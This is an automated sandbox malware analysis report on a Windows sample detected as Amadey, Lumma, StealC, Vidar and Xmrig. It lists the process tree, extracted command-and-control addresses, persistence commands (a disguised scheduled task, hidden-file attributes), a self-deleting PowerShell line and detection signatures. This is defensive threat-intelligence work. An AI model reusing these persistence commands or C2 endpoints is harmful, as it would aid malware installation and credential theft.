Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1579075
MD5:	99a7a8ab2463dd70f90e0ab4e0aec4a8
SHA1:	b9e2b99b7124d83df3b7cd052231cb35d1d6efcb
SHA256:	89601168c7196328f763faf4dd415b041c94f6d5fe5c2b7094d49dba69926a61
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Drops password protected ZIP file

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Found strings related to Crypto-Mining

Hides threads from debuggers

Injects code into the Windows Explorer (explorer.exe)

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses cmd line tools excessively to alter registry or file data

Uses ping.exe to check the status of other devices and networks

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 99A7A8AB2463DD70F90E0AB4E0AEC4A8)

skotes.exe (PID: 7596 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 99A7A8AB2463DD70F90E0AB4E0AEC4A8)

skotes.exe (PID: 7780 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 99A7A8AB2463DD70F90E0AB4E0AEC4A8)

skotes.exe (PID: 7416 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 99A7A8AB2463DD70F90E0AB4E0AEC4A8)

c359af6492.exe (PID: 7548 cmdline: "C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)

cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mode.com (PID: 8172 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)

7z.exe (PID: 8136 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 7608 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 7512 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 1416 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 2996 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 1612 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 6968 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 2968 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

attrib.exe (PID: 6508 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

in.exe (PID: 5564 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)

attrib.exe (PID: 7944 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 7932 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7952 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7988 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 6940 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

352def4414.exe (PID: 4020 cmdline: "C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe" MD5: F8D2B32727EAE3B8B27AB03CA770A941)

d5cd5e4aa8.exe (PID: 504 cmdline: "C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe" MD5: 341918EFC0EB0FE89609A7486A9ED04A)

ea17d0b77a.exe (PID: 3920 cmdline: "C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe" MD5: D52E2D9DC21C02FA5F8161754B7B6463)

9434b989db.exe (PID: 7128 cmdline: "C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe" MD5: AD87440D4B97E759F9D4EE9D6279D06E)

Intel_PTT_EK_Recertification.exe (PID: 6896 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)

explorer.exe (PID: 6432 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

powershell.exe (PID: 5356 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7136 cmdline: "C:\Windows\system32\PING.EXE" 127.1.10.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Threatname: LummaC

{"C2 url": ["energyaffai.lat", "rapeflowwj.lat", "aspecteirs.lat", "sweepyribs.lat", "necklacebudi.lat", "sustainskelet.lat", "discokeyus.lat", "crosshuaht.lat", "grannyejh.lat"], "Build id": "PsFKDg--pablo"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000030.00000003.3334314821.0000000004930000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000030.00000002.4222202528.0000000000F21000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000003.2262477071.0000000004960000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000028.00000002.3026870349.0000000000847000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000028.00000002.3026870349.000000000086B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000028.00000002.3028044780.000000014040B000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002E.00000002.4037878938.0000000004B70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000002E.00000002.4018196816.0000000000F39000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x908:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000028.00000002.3026870349.0000000000895000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000E.00000003.2755017599.00000000050A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000004.00000003.2272594198.0000000005390000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.2221672468.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 6896	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: explorer.exe PID: 6432	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: ea17d0b77a.exe PID: 3920	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ea17d0b77a.exe PID: 3920	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ea17d0b77a.exe PID: 3920	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 9434b989db.exe PID: 7128	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 9434b989db.exe PID: 7128	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 9434b989db.exe PID: 7128	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 9434b989db.exe PID: 7128	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.skotes.exe.f30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.b20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.skotes.exe.f30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x324cc8:$x1: donate.ssl.xmrig.com
39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x325978:$s1: %s/%s (Windows NT %lu.%lu 0x329580:$s3: \\.\WinRing0_ 0x2e3130:$s4: pool_wallet 0x2dd978:$s5: cryptonight 0x2dd988:$s5: cryptonight 0x2dd998:$s5: cryptonight 0x2dd9a8:$s5: cryptonight 0x2dd9c0:$s5: cryptonight 0x2dd9d0:$s5: cryptonight 0x2dd9e0:$s5: cryptonight 0x2dd9f8:$s5: cryptonight 0x2dda08:$s5: cryptonight 0x2dda20:$s5: cryptonight 0x2dda38:$s5: cryptonight 0x2dda48:$s5: cryptonight 0x2dda58:$s5: cryptonight 0x2dda68:$s5: cryptonight 0x2dda80:$s5: cryptonight 0x2dda98:$s5: cryptonight 0x2ddaa8:$s5: cryptonight 0x2ddab8:$s5: cryptonight
40.2.explorer.exe.140000000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
40.2.explorer.exe.140000000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
40.2.explorer.exe.140000000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ea17d0b77a.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ea17d0b77a.exe

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 5564, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 7952, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ping 127.0.0.1; del in.exe, CommandLine: powershell ping 127.0.0.1; del in.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 5564, ParentProcessName: in.exe, ProcessCommandLine: powershell ping 127.0.0.1; del in.exe, ProcessId: 7988, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Avira: detection malicious, Label: HEUR/AGEN.1352802
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Avira: detection malicious, Label: HEUR/AGEN.1352802
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Found malware configuration

Source: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: ea17d0b77a.exe.3920.47.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "rapeflowwj.lat", "aspecteirs.lat", "sweepyribs.lat", "necklacebudi.lat", "sustainskelet.lat", "discokeyus.lat", "crosshuaht.lat", "grannyejh.lat"], "Build id": "PsFKDg--pablo"}
Source: 9434b989db.exe.7128.48.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	ReversingLabs: Detection: 69%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 50%

AI detected suspicious sample

